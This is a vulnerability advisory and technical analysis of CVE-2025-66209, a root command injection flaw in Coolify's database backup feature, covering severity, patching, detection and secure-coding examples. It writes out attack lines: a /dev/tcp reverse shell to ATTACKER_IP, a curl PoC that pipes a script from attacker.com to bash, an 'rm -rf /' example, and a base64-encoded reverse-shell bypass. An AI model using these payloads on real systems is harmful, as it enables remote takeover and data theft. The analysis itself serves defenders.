CVE-2025-66209
Weakness (CWE)
CVSS Vector (v3.1): CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: Low
- User Interaction: None
- Scope: Changed
- Confidentiality: High
- Integrity: High
- Availability: High
Description
Coolify is an open-source and self-hostable tool for managing servers, applications, and databases. Prior to version 4.0.0-beta.451, an authenticated command injection vulnerability in the Database Backup functionality allows users with application/service management permissions to execute arbitrary commands as root on managed servers. Database names used in backup operations are passed directly to shell commands without sanitization, enabling full remote code execution. Version 4.0.0-beta.451 fixes the issue.
Comprehensive Technical Analysis of CVE-2025-66209
Vulnerability ID: CVE-2025-66209
CVSS Score: 9.9 (Critical)
Affected Software: Coolify (prior to v4.0.0-beta.451)
Vulnerability Type: Authenticated Command Injection (Remote Code Execution - RCE)
1. Vulnerability Assessment & Severity Evaluation
Vulnerability Overview
CVE-2025-66209 is an authenticated command injection vulnerability in Coolify, an open-source self-hosted infrastructure management tool. The flaw resides in the Database Backup functionality, where user-controlled input (database names) is passed unsanitized into shell commands, allowing arbitrary command execution with root privileges on managed servers.
Severity Justification (CVSS 9.9 - Critical)
The CVSS v3.1 scoring breakdown is as follows:
| Metric | Value | Justification |
|---|---|---|
| Attack Vector (AV) | Network | Exploitable remotely via web interface. |
| Attack Complexity (AC) | Low | No specialized conditions required. |
| Privileges Required (PR) | Low | Requires authenticated access with application/service management permissions. |
| User Interaction (UI) | None | No user interaction needed. |
| Scope (S) | Changed | Impact extends beyond the vulnerable component (affects underlying host). |
| Confidentiality (C) | High | Full system compromise possible. |
| Integrity (I) | High | Arbitrary command execution allows data tampering. |
| Availability (A) | High | Attacker can disrupt services or delete data. |
Key Factors Contributing to Critical Severity:
- Root-level RCE – Commands execute with the highest privileges.
- Low Attack Complexity – Exploitation requires only basic scripting knowledge.
- Network-Exploitable – Can be triggered remotely via the web interface.
- High Impact – Full system compromise, lateral movement, and persistence possible.
2. Potential Attack Vectors & Exploitation Methods
Exploitation Prerequisites
- Authenticated Access – Attacker must have a valid account with application/service management permissions (e.g., a developer or admin role).
- Database Backup Functionality – The vulnerability is triggered when initiating a backup operation with a maliciously crafted database name.
Exploitation Steps
1. Identify Target Database
- The attacker lists available databases in Coolify’s interface.
- Alternatively, they may create a new database with a malicious name.
2. Craft Malicious Database Name
- The database name is injected with shell metacharacters (e.g., ;, |, &&, `, $()) to break out of the intended command.
- Example payload: legit_db_name; id > /tmp/pwned; echo "exploited" #
- This would execute id > /tmp/pwned and append "exploited" to the backup log.
3. Trigger Backup Operation
- The attacker initiates a backup via the Coolify UI or API.
- The unsanitized database name is passed to a shell command (e.g., mysqldump, pg_dump), leading to arbitrary command execution.
4. Post-Exploitation
- Reverse Shell: Attacker could spawn a reverse shell: legit_db_name; bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' #
- Data Exfiltration: Steal sensitive files (/etc/passwd, SSH keys, database credentials).
- Persistence: Install backdoors (e.g., cron jobs, SSH keys, malicious services).
- Lateral Movement: Pivot to other systems in the network.
Proof-of-Concept (PoC) Exploit
A simplified PoC (for educational purposes only):
```bash
# Step 1: Create a database with a malicious name
curl -X POST "https://coolify-instance/api/databases" \
  -H "Authorization: Bearer <VALID_TOKEN>" \
  -H "Content-Type: application/json" \
  -d '{"name": "legit_db; curl http://attacker.com/shell.sh | bash #", "type": "mysql"}'

# Step 2: Trigger backup
curl -X POST "https://coolify-instance/api/databases/backup" \
  -H "Authorization: Bearer <VALID_TOKEN>" \
  -H "Content-Type: application/json" \
  -d '{"database_id": "<MALICIOUS_DB_ID>"}'
```
Result: The curl command fetches and executes a malicious script from the attacker’s server.
3. Affected Systems & Software Versions
Vulnerable Versions
- Coolify versions prior to 4.0.0-beta.451 (all releases before the fix).
- Self-hosted instances are at risk; cloud-managed versions may also be affected if not updated.
Affected Components
- Database Backup Module – Specifically, the code responsible for generating and executing backup commands (e.g., mysqldump, pg_dump).
- Shell Command Execution – Any function that passes user-controlled input to exec(), system(), or similar functions without proper sanitization.
Unaffected Versions
- Coolify 4.0.0-beta.451 and later – Patched to sanitize database names before command execution.
4. Recommended Mitigation Strategies
Immediate Actions
1. Upgrade to the Latest Version
- Apply Coolify v4.0.0-beta.451 or later immediately.
- Patch URL: https://github.com/coollabsio/coolify/releases/tag/v4.0.0-beta.451
2. Temporary Workarounds (If Upgrade Not Possible)
- Disable Database Backup Functionality – Remove or restrict access to the backup feature.
- Input Validation & Sanitization – Manually patch the code to escape shell metacharacters (e.g., using escapeshellarg() in PHP or shlex.quote() in Python).
- Least Privilege Principle – Ensure Coolify runs under a non-root user with minimal permissions.
- Network Segmentation – Isolate Coolify instances from critical internal systems.
3. Monitor for Exploitation Attempts
- Log Analysis – Check for unusual database names containing shell metacharacters (;, |, &&, etc.).
- Intrusion Detection – Deploy WAF rules (e.g., ModSecurity) to block suspicious backup requests.
- File Integrity Monitoring (FIM) – Detect unauthorized changes to system files.
Long-Term Security Recommendations
1. Code Review & Secure Development Practices
- Input Sanitization – Always sanitize user input before passing it to shell commands.
- Use Parameterized Commands – Avoid string concatenation in shell commands (e.g., use subprocess.run() with shell=False in Python).
- Static & Dynamic Analysis – Integrate SAST/DAST tools (e.g., SonarQube, OWASP ZAP) into CI/CD pipelines.
2. Access Control & Authentication
- Role-Based Access Control (RBAC) – Restrict database backup permissions to trusted admins only.
- Multi-Factor Authentication (MFA) – Enforce MFA for all Coolify accounts.
- Session Management – Implement short-lived sessions and rate limiting.
3. Infrastructure Hardening
- Containerization – Run Coolify in a Docker container with read-only filesystems where possible.
- Seccomp & AppArmor – Apply security profiles to restrict process capabilities.
- Regular Audits – Conduct penetration testing and vulnerability scans.
5. Impact on the Cybersecurity Landscape
Broader Implications
1. Supply Chain Risks
- Coolify is used by DevOps teams to manage cloud infrastructure, making it a high-value target for attackers.
- Compromise could lead to lateral movement into CI/CD pipelines, Kubernetes clusters, or cloud environments.
2. Increased Attack Surface for Self-Hosted Tools
- The rise of self-hosted alternatives (e.g., Coolify, CapRover, Portainer) introduces new risks if not properly secured.
- Many organizations lack the expertise to harden these tools effectively.
3. Exploitation in the Wild
- Given the low complexity of exploitation, this vulnerability is likely to be weaponized quickly by:
  - APT Groups (for espionage or ransomware deployment).
  - Cryptojacking Campaigns (mining malware).
  - Initial Access Brokers (IABs) (selling access to compromised systems).
4. Regulatory & Compliance Risks
- Organizations using Coolify may face compliance violations (e.g., GDPR, HIPAA, PCI-DSS) if exploited.
- Incident Response Costs – Breaches could lead to costly investigations and legal repercussions.
Historical Context
- Similar vulnerabilities have been observed in other infrastructure-as-code (IaC) tools (e.g., CVE-2021-41079 in Portainer, CVE-2020-15157 in Docker).
- Command injection flaws remain a top OWASP risk (A03:2021 – Injection).
6. Technical Details for Security Professionals
Root Cause Analysis
The vulnerability stems from improper input sanitization in Coolify’s backup functionality. Specifically:
- Database names are passed directly to shell commands without escaping special characters.
- Example vulnerable code (pseudo-code):
```
# Vulnerable command construction
backup_command="mysqldump -u $DB_USER -p$DB_PASS $DB_NAME > /backups/$DB_NAME.sql"
system($backup_command)
```
- If $DB_NAME contains ; rm -rf /, the command becomes: mysqldump -u user -ppass legit_db; rm -rf / > /backups/legit_db.sql
Patch Analysis
The fix in v4.0.0-beta.451 introduces:
- Input Sanitization – Database names are now escaped using escapeshellarg() (or equivalent).
- Parameterized Commands – Commands are constructed using safe argument passing (e.g., exec() with an array of arguments).
- Additional Validation – Database names are checked against a whitelist of allowed characters.
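The three fixes just listed, and the escapeshellarg()/shlex.quote() and shell=False advice from the mitigation section, shown side by side in Python as an added example; this is not Coolify's code or its actual patch. It assumes a mysqldump-style backup command, constructed placeholder credentials, and mysqldump's real --result-file option; the page's vulnerable pseudo-code is rebuilt only as a string for inspection and is never executed.

```python
"""Added example (not Coolify's code or patch): string-built backup command versus
quoting and an argv list, plus the allow-list check the patch analysis describes."""
import re
import shlex

# Constructed placeholder values, not real credentials.
DB_USER = "backup_user"
DB_PASS = "placeholder-password"
# Allow-list: letters, digits, underscore, 1-64 chars, so no metacharacter can appear.
DB_NAME_RE = re.compile(r"^[A-Za-z0-9_]{1,64}$")

def validate_db_name(name: str) -> bool:
    """True only for names that pass the allow-list."""
    return DB_NAME_RE.fullmatch(name) is not None

def vulnerable_command(db_name: str) -> str:
    """The string the page's pseudo-code hands to system(); built for inspection only."""
    return f"mysqldump -u {DB_USER} -p{DB_PASS} {db_name} > /backups/{db_name}.sql"

def quoted_command(db_name: str) -> str:
    """shlex.quote() (Python's counterpart of PHP escapeshellarg()) keeps the name a
    single shell word, so a crafted value cannot start a second command."""
    q = shlex.quote(db_name)
    return f"mysqldump -u {DB_USER} -p{DB_PASS} {q} > /backups/{q}.sql"

def safe_backup_argv(db_name: str) -> list[str]:
    """Argument vector for subprocess.run(argv, shell=False): no shell parses it, and
    mysqldump's --result-file replaces the '>' redirection entirely."""
    if not validate_db_name(db_name):
        raise ValueError(f"rejected database name: {db_name!r}")
    return ["mysqldump", "-u", DB_USER, f"-p{DB_PASS}",
            f"--result-file=/backups/{db_name}.sql", db_name]

def command_count(cmd: str) -> int:
    """Number of commands a POSIX shell would run for cmd, counting ';' separators
    the way the shell tokenises them (shlex punctuation_chars, Python 3.8+).
    1 means the database name stayed inside the one mysqldump invocation."""
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return 1 + sum(1 for token in lexer if token == ";")

if __name__ == "__main__":
    crafted = "legit_db; rm -rf /"
    print(command_count(vulnerable_command(crafted)))  # 3: two injected commands
    print(command_count(quoted_command(crafted)))      # 1: quoting kept one word
    print(safe_backup_argv("legit_db"))
```

Note that the string-built form actually expands the crafted name twice (once in the argument and once in the output path), so the injected commands run twice; the argv form never reaches a shell at all.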
Detection & Forensics
1. Log Indicators of Compromise (IoCs)
- Unusual database names in backup logs (e.g., containing ;, |, &&).
- Unexpected processes running as root (e.g., bash, nc, curl).
- Suspicious outbound connections from the Coolify server.
2. Forensic Artifacts
- Shell History (/root/.bash_history, /home/*/.bash_history).
- Cron Jobs (/etc/crontab, /var/spool/cron/).
- Network Connections (netstat -tulnp, ss -tulnp).
- File Integrity Changes (rpm -Va, debsums, AIDE).
3. YARA Rule for Exploitation Detection
```yara
rule Coolify_CVE_2025_66209_Exploit
{
    meta:
        description = "Detects potential CVE-2025-66209 exploitation in Coolify logs"
        author = "Cybersecurity Analyst"
        reference = "CVE-2025-66209"
        date = "2025-12-24"
    strings:
        $db_name_suspicious = /(;|\||&&|`|\$\().*(\/bin\/bash|\/bin\/sh|nc|curl|wget|python|perl)/ nocase
        $backup_log = /backup.*(failed|error|executed).*[;|&|`]/ nocase
    condition:
        $db_name_suspicious or $backup_log
}
```
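A small scanner for the first log indicator above (and the Log Analysis item under Monitor for Exploitation Attempts), added here as an example rather than taken from Coolify or the page. It assumes a constructed key=value log format with a database="..." field; Coolify's real log layout may differ, so the field regex is the part to adapt.

```python
"""Added example (not Coolify's tooling): flag backup log entries whose database name
carries shell metacharacters, the log indicator the advisory lists."""
import re

# Constructed sample lines in an assumed key=value format; Coolify's real log layout
# may differ, so adjust DB_FIELD_RE to the field that records the database name.
SAMPLE_LOG = """\
2025-12-24T10:01:12Z INFO backup started database="orders_prod" server="db-01"
2025-12-24T10:03:45Z INFO backup started database="legit_db; id > /tmp/pwned #" server="db-01"
2025-12-24T10:04:02Z INFO backup started database="reports" server="db-02"
2025-12-24T10:07:30Z INFO backup started database="app$(curl example.invalid)" server="db-01"
2025-12-24T10:09:00Z INFO backup started database="a`whoami`" server="db-02"
2025-12-24T10:11:15Z INFO backup started database="my db-2" server="db-02"
2025-12-24T10:12:40Z INFO backup finished server="db-01" status="ok"
"""

DB_FIELD_RE = re.compile(r'database="([^"]*)"')
SAFE_NAME_RE = re.compile(r"^[A-Za-z0-9_]{1,64}$")  # conservative identifier alphabet
META_RE = re.compile(r"[;|&`$()<>\\\n\r]")          # shell separators and substitution

def classify_name(name: str) -> str:
    """'ok' for allow-listed names; 'shell-metachar' is the high-confidence signal,
    'unexpected-charset' catches anything else outside the alphabet (spaces, hyphens)."""
    if SAFE_NAME_RE.fullmatch(name):
        return "ok"
    if META_RE.search(name):
        return "shell-metachar"
    return "unexpected-charset"

def scan_backup_log(text: str) -> list[dict]:
    """Return one finding per log line whose database name is not allow-listed."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        match = DB_FIELD_RE.search(line)
        if not match:
            continue  # lines without a database field are not backup starts
        verdict = classify_name(match.group(1))
        if verdict != "ok":
            findings.append({"line": lineno, "db_name": match.group(1), "verdict": verdict})
    return findings

if __name__ == "__main__":
    for finding in scan_backup_log(SAMPLE_LOG):
        print(finding)
```

Allow-listing the identifier alphabet rather than blocklisting a few metacharacters means encoded or unusual separators still surface, at the cost of a lower-severity finding for harmless but non-conforming names.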
Exploit Development Considerations
- Bypassing Sanitization – If input filtering is weak, attackers may use:
  - Unicode encoding (e.g., %3B for ;).
  - Command substitution (e.g., `id`).
  - Base64-encoded payloads (e.g., echo "YmFzaCAtaSA+JiAvZGV2L3RjcC9BVEFDS0VSLUlQLzQ0NDQgMD4mMQ==" | base64 -d | bash).
- Chaining with Other Vulnerabilities – If Coolify has other flaws (e.g., SSRF, IDOR), an attacker could escalate privileges further.
Conclusion
CVE-2025-66209 represents a critical risk to organizations using Coolify, enabling full system compromise with minimal effort. Given the low attack complexity and high impact, immediate patching is mandatory. Security teams should:
- Upgrade to v4.0.0-beta.451 without delay.
- Audit logs for signs of exploitation.
- Harden Coolify deployments using least privilege and network segmentation.
- Monitor for post-exploitation activity (e.g., reverse shells, data exfiltration).
This vulnerability underscores the importance of secure coding practices and proactive vulnerability management in self-hosted infrastructure tools. Organizations should treat this as a high-priority incident and respond accordingly.